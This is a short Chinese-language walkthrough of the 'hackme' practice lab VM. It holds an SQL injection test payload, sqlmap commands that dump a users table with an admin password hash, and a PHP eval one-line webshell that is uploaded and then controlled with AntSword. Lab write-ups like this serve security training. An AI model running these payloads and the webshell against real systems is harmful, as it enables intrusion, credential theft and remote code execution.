当前位置: 首页 > news >正文

hackme靶场攻略

1.打开kali虚拟机和hackme靶机,都用nat模式连接

2.用kali扫描hackme靶机的ip

3.外部浏览器访问靶机IP

4.运用kali dirb命令扫描敏感文件

5.注册用户,登录

6.进入首页,发现是一个查询页面,可能存在sql注入

7.判断是否存在sql注入

windows

windows' and 1=2#

8.bp抓搜索的包

将抓到的包保存成一个文件,在windows后面加一个*,说明这里是注入点

9.kali中使用sqlmap工具

爆破库名

sqlmap -r '1.txt' --current-db


爆破表名

sqlmap -r '1.txt' -D webapphacking --tables


打印‘users’表

sqlmap -r '1.txt' -D webapphacking -T users --dump

                         

发现有一个超级管理员用户,密码md5解密

10.登录超级管理员用户,发现文件上传

11.上传一句话木马

<?php @eval($_POST['cmd']);?>

12.访问uploads目录下,发现上传的木马

13.蚁剑连接

相关文章:

  • CSV文件保存后内容缩在首格内
  • 基于Java 童装在线销售系统(源码+lw+部署文档+讲解),源码可白嫖!
  • conda创建Python虚拟环境的原理
  • 线性代数(1)用 excel 计算鸡兔同笼
  • d3_v7 基于 d3.arc()生成径向柱状图
  • CMake
  • 多线程与并发编程 面试专题
  • SQLAlchemy系列教程:批量插入数据
  • React Vue 项开发中组件封装原则及注意事项
  • 几个金融衍生产品:
  • 浙江大学第四讲:DeepSeek模型优势:算力、成本角度解读(含PPT及直播回放)(文末附链接下载)
  • 【时时三省】(C语言基础)输入输出的概念
  • 【原创】MCP服务介绍使用MCP实现类Manus Agent
  • SpaceSense Systems 借助桂花网解决方案实现工业设备预测性维护与状态监测升级
  • Docker基础命令说明
  • 算法刷题整理合集(一)
  • 人工智能-周志华ML版|系列习题参考答案与综合测试目录
  • c# 查找相似颜色算法
  • 个人学习编程(3-13) 刷题2
  • 深度学习环境配置指令大全
  • iis默认网站 建设中/百度seo软件首选帝搜软件
  • 专业网站营销/网络广告营销的概念
  • 岳阳市住房和城乡建设路网站/关键词代发排名首页
  • 2015年做哪些网站能致富/怎么打广告宣传自己的产品
  • 网站做301好不好/产品营销推广的方案
  • 企业网站的建立和推广/一键制作单页网站